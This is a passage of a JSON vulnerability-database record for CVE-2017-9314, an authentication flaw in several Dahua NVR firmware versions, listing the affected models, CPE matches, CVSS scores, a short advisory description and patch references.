            "version": "dh_nvr5464_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5424-24p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5424_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5864-16p-4ks2",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_nvr5864_eng_p_v2.616.0000.0.r.20171102"
          },
          {
            "model": "nvr5208-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5208-8p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5216-16p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5216-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5216-8p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5224-24p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5232-16p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5232-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5232-8p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5416-16p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5416-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5424-24p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5432-16p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5432-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5464-16p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5464-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5816-16p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5816-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5832-16p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5832-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5864-16p-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "nvr5864-4ks2",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dh nvr5xxx \u003ceng p v2.616.0000.0.r.20171102",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security nvr52xx \u003cdh nvr5xxx eng p v2.616.0000.0.r.20171102",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security nvr54xx \u003cdh nvr5xxx eng p v2.616.0000.0.r.20171102",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security nvr58xx \u003cdh nvr5xxx eng p v2.616.0000.0.r.20171102",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-36534"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-010134"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9314"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5464-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5464_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5464-16p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5208-8p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5208_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5208-8p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5432-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5432_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5432-16p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5416-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5416_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5416-16p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5464-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5464_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5464-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5432-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5432_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5432-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5416-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5416_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5416-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5232-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5232-16p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5216-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5216-16p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5232-8p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5232-8p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5216-8p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5216-8p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5232-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5232_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5232-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5216-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5216_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5216-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5208-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5208_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5208-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5816-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5816_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5816-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5832-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5832_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5832-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5864-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5864_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5864-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5864-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5864_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5864-16p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5832-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5832_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5832-16p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5816-16p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5816_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5816-16p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5424-24p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5424_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5424-24p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr5224-24p-4ks2_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_nvr5224_eng_p_v2.616.0000.0.r.20171102",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:nvr5224-24p-4ks2:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-9314"
          }
        ]
      },
      "cve": "CVE-2017-9314",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 6.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2017-9314",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2017-36534",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 8.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-9314",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-9314",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-36534",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201705-1394",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-36534"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-010134"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9314"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1394"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Authentication vulnerability found in Dahua NVR models NVR50XX, NVR52XX, NVR54XX, NVR58XX with software before DH_NVR5xxx_Eng_P_V2.616.0000.0.R.20171102. Attacker could exploit this vulnerability to gain access to additional operations by means of forging json message. Dahua NVR The model software contains authentication vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. DahuaNVR50XX and so on are all Dahua\u0027s network hard disk camera products. There are security vulnerabilities in several Dahua products",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-9314"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-010134"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-36534"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-9314",
            "trust": 3.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-010134",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-36534",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1394",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-36534"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-010134"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9314"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1394"
          }
        ]
      },
      "id": "VAR-201711-1046",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-36534"
          }
        ],
        "trust": 1.6
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-36534"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:24:17.002000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "DHCC-SA-201711-002",
            "trust": 0.8,
            "url": "http://www.dahuasecurity.com/annoucementsingle/security-advisory--authentication-vulnerability-found-in-some-dahua-nvr_14731_211.html"
          },
          {
            "title": "Patches for multiple Dahua product access verification vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/108305"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-36534"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-010134"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-010134"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9314"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.6,
            "url": "http://www.dahuasecurity.com/annoucementsingle/security-advisory--authentication-vulnerability-found-in-some-dahua-nvr_14731_211.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-9314"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9314"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-36534"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-010134"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9314"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1394"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-36534"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-010134"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9314"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1394"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
